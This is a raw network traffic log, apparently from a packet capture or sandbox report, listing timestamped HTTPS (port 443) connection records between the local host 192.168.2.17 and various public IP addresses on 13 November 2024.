                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.318243980 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.318279028 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.318344116 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.318660975 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.318674088 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.319032907 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.319041014 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.319096088 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.319277048 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.319281101 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.329564095 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361437082 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361453056 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361469984 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361476898 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361500025 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361777067 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361777067 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361807108 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.361870050 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.362066031 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.362078905 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.372062922 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.372291088 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.372312069 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.373325109 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.373380899 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.374659061 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.374718904 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.374799013 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.415329933 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.419063091 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.425518990 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.425529957 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426045895 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426053047 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426078081 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426110029 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426117897 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426152945 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426152945 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426176071 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426232100 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426233053 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426259995 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426282883 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426315069 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426316023 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426321983 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426347971 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426352978 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426402092 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426409006 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426450968 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426801920 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426856041 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426906109 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426928043 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426934004 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426947117 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426958084 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426980972 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.426985979 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.427006006 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.427103043 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.427146912 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.427414894 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.427428961 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.427436113 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.427468061 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.428885937 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.428900003 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.431687117 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.431719065 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.431791067 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.432102919 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.432116032 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.437602997 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.437777996 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.438086987 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.438148975 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.438179016 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.438215971 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.442472935 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.442500114 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.442589998 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.442842960 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.442858934 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443736076 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443763018 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443804979 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.444048882 CET49922443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.444062948 CET44349922157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.447457075 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.447487116 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.447707891 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.447876930 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.447890997 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.448302031 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.448329926 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.448394060 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.448633909 CET49924443192.168.2.1718.66.102.121
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.448646069 CET4434992418.66.102.121192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.473539114 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500202894 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500335932 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500401020 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500411987 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500457048 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500462055 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500561953 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500617981 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500766039 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.500776052 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.526211023 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.526410103 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.526424885 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.529927969 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.529988050 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.530797958 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.530853987 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.530940056 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.530946016 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.584592104 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.639946938 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.640038967 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.640103102 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.640162945 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.640208006 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.640208006 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.640227079 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655203104 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655272007 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655323029 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655410051 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655426025 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655436039 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655472994 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655931950 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.655956030 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.657286882 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.657641888 CET49925443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.657656908 CET44349925151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.679538965 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.679555893 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.679964066 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.680007935 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.680069923 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.681370974 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.681392908 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.683614016 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.683638096 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.683659077 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.683686018 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.683877945 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.683885098 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.684108973 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.684123039 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.698668957 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.698700905 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.698764086 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.698983908 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.698997974 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.728746891 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.728805065 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.728895903 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.729120016 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.729137897 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.854651928 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.855055094 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.855082989 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.855437040 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.856110096 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.856110096 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.856159925 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.856210947 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.903546095 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.973717928 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.973906040 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.973925114 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.974214077 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.974670887 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.974724054 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.974875927 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.976892948 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.977065086 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.977078915 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.977946043 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.978024006 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.978230953 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.978286028 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.978318930 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.014225006 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.014993906 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.015111923 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.015181065 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.018795967 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.018997908 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.019018888 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.019330978 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.019345045 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.019948959 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.020009041 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.020787954 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.020848036 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.020914078 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.020925045 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.020940065 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.024825096 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.024849892 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.024919033 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.025087118 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.025094986 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.027532101 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.027539968 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.067327023 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.074980021 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.075375080 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.075381994 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.075548887 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.075627089 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.075683117 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.076021910 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.076072931 CET4434991813.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.076176882 CET49918443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.094451904 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.095330000 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.095346928 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.098887920 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.099219084 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.099219084 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.099396944 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.099396944 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.099401951 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.099437952 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.101242065 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.101428032 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.101458073 CET4434990754.75.69.192192.168.2.17
